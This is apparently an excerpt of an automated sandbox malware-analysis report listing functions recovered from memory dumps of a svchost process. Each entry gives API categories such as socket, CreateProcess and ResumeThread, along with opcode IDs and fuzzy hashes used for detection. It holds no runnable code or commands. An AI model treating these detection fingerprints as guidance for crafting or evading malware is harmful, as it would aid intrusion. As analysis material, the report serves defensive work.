                                                                                                                                                                                          • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                          • Instruction ID: 24fc751b1394d6d1c96ddf499778ac01e11f142f676466b5daed63558fdef351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9D1613151CB888BE766EF24D4857EBB7E1FB94300F14462EE49FD21A1EF74A5058B82
                                                                                                                                                                                          Function 00007DF44159128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3388366904-0
                                                                                                                                                                                          • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                          • Instruction ID: f059bf629c431773f2d0f33642f8f5401e41171d7ae6adf53cf3d7b1697c7a64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB71917061CA944FE759BF2894C53AAB2E1FBD8311F50093EE49FD32A2DB7898458642
                                                                                                                                                                                          Function 00007DF441579F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3388366904-0
                                                                                                                                                                                          • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                          • Instruction ID: bb334a34ce2aaceeb58334fe33a54ab59a37a395e3e61c55b8bbf7028f5b9832
                                                                                                                                                                                          • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641D57060C6484FEB59EF28988566BB3E5FBD9701F04052EE89FD31A1EE74D9018786
                                                                                                                                                                                          Function 00007DF4415B8194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                          • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                          • Instruction ID: 376b44362d9453844c1522f23aae5b3f1202143097b0f8ee3b8e951a0b6ad246
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E41F530618E44DFF759AF28D898AAF77E5FB89301F50113AE45BD22A1DB78D8018782
                                                                                                                                                                                          Function 00007DF4415B9488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                          • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                          • Instruction ID: b4a9d939b46c4a3ecd00d790545d1165fe1150508c9ea08fc7b83a719ef077f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6931D4707089449FFB55AA289885BAA32E4FF85314F50007AD81FE21E3EA79EC418692
                                                                                                                                                                                          Function 00007DF441590E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3388366904-0
                                                                                                                                                                                          • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                          • Instruction ID: dc5ddf99fba3177234c208a6f2a7f6474f6cc64b3b9d08ccb8f47347cc5f825a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210B7071C7444FF355AA5C68C627B73E8EBD9720F10053FE99FC2252DAB4A8064683
                                                                                                                                                                                          Function 00007DF44158A38C Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Initializefree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1505762977-0
                                                                                                                                                                                          • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                                                          • Instruction ID: 56e75ffe80eb2e8c97c6874f9231f8e7dad111fc430cb067bbf7acc1a600dc51
                                                                                                                                                                                          • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15218330608A089FDF94FF28D845A9A77E0FF94315F00462AB81ED3191DB35E8418B91
                                                                                                                                                                                          Function 00007DF44157D818 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AcceptConnectNameName_Portcallocfreemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2547275272-0
                                                                                                                                                                                          • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                          • Instruction ID: 270d472fd4ec8b52868113fdc6fb1e9d3e83ce00061676810d434e040d93830e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9012631228E084FE749BB5CEC8A4F677E1E799762B04817BE40BC3261DD39E8418BD1
                                                                                                                                                                                          Function 000002435D5330C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2393323556.000002435D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D530000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_2435d530000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                          • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                                                          • Instruction ID: 2fd4dc80e90c9f1b3e3f015c633d79d401ba8273cbd3104a3f7b1944fcef0d5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20C19730218B498FEB58EF1CC489B69B7E1FB98310F408A5DF58AC7656DB34E945CB81
                                                                                                                                                                                          Function 00007DF441576984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Timer$CreateQueue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3971536239-0
                                                                                                                                                                                          • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                                                          • Instruction ID: fe448e14f4d759352052873075f10b61da532b9b8f6ef8b63b907b3d9f1df2a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9B16030A1CA489BF766FB2898496E772E1FBD4310F50462AD46FD21A1EF78A542C681
                                                                                                                                                                                          Function 00007DF441579BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFileMapping
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 524692379-0
                                                                                                                                                                                          • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                          • Instruction ID: fa8c025847eca42e79e11b12aa1b386069107a7b61b44e13cd3ebe4d723a8629
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50B1703160CA888FEB55FF24D485AEAB7E1FB94300F504A2EE06FD31A1DA74E545CB81
                                                                                                                                                                                          Function 00007DF4415B9A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                          • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                          • Instruction ID: 8628b4a741a15cdaf2d028020c3fe1ce19c2d80ae4b653d0970abf5c3ced1306
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D918EB0618E45DFFB94EF28C488BA677E0FF44314F60016AD41BC65A2EB79E840CB51
                                                                                                                                                                                          Function 00007DF441575870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                          • Instruction ID: 906606e82abf34334c9314ed78a339ebb51b12a628549f062f923f91f3d5b6e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60616A3151CA889BE766FF64C8956EBB7E1FBD4300F004A2EE09FD2161DE74A544CB82
                                                                                                                                                                                          Function 00007DF441590BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                          • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                          • Instruction ID: b57331e4b24f8c649a14534298b3d3468f07a880037eaa9f161b24d238d40e03
                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F551433061CB849FE765EB18D8457ABB7E5FFD4310F00092EE49AD3161DBB4E9018B92
                                                                                                                                                                                          Function 00007DF4415784B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF4415737B8), ref: 00007DF4415785F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3978063606-0
                                                                                                                                                                                          • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                          • Instruction ID: d69d01a4d0285e6f7d405633c29a8c109f6e7c6c398c0c56add871a98c927837
                                                                                                                                                                                          • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41A6307089886FFB56FB6884965AA73A1EB94700F044526E42FD76A5DE78EC018785
                                                                                                                                                                                          Function 00007DF4415736BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                          • Instruction ID: e8596162212528cbfef8aae09a6857d3ac48b4e3a9f8a8347d97354364ad69f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5319721B185947BFBD6BB5895835EA72F2EFC4320F50043AD03FD32E2D9A8A9458685
                                                                                                                                                                                          Function 000002435D421870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000002.2781939497.000002435D420000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D420000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_2435d420000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                          • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                          • Instruction ID: a37648e0e1f2088a7290a7bfcaf9306be8950e7b0307afdbec215f0617edc1eb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF31E470101A075AFBA5DF6888987F976D0EB89390FA481B9C417E30D1EF39CB89C780
                                                                                                                                                                                          Function 00007DF4415B9878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                          • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                          • Instruction ID: 720f95863bbf46d29ffb7eeb954caf9d57a308e6a52b1cc4812f03088481d7c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2021B6307089048FFB49AB3898887A673E1FB95325F10067AE83FD22E2DA789C018651
                                                                                                                                                                                          Function 00007DF441576748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getaddrinfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 300660673-0
                                                                                                                                                                                          • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                          • Instruction ID: 1769691c5b0a6552da34a31e7702aa888abb5bb542c3dd2a6ae1a6189e4ed683
                                                                                                                                                                                          • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50316F70608A498FFB55EF24C899B9673E1FF98704F100179D85ED72A1DB79E802CB41
                                                                                                                                                                                          Function 00007DF4415B8420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                          • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                          • Instruction ID: b3b59a9067c24c70357035778fa46ae1af10a62e3212f803dc20b524f4621db5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E118B30718D499FF655BB689884BA672E1FFC8315F50063EE42FD22E2DB7CAC068640
                                                                                                                                                                                          Function 00007DF441562B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                          • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                          • Instruction ID: e7faf994600cb2e049edbbaa52407392a139660a1de64c79c23d91ce5b71e818
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06012B30A149095FEB55EB28EC8866633E6FBCC351B044075E80EC3164DAB5AC81C790
                                                                                                                                                                                          Function 00007DF441562D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                          • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                          • Instruction ID: 1c619da27e69d12012827fcd56887516ca63e66412bca6b013f9defb78ee1ef4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0A061E0D5485AF715BA7A7C802A632B1ABD4360F14893BD52FD25A1D9B988C25390
                                                                                                                                                                                          Function 00007DF441573424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                          • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                          • Instruction ID: 38b40fb817a3ca707c755056702735234b81225fd528f38876de8d5487a8e9ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95E0C211F08C0D2B7BA971AE248C5BB55D6CBDC172704027BE42DC32A5ECA4CC820384
                                                                                                                                                                                          Function 00007DF441590DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                          • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                                                                                          Function 00007DF4415733F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
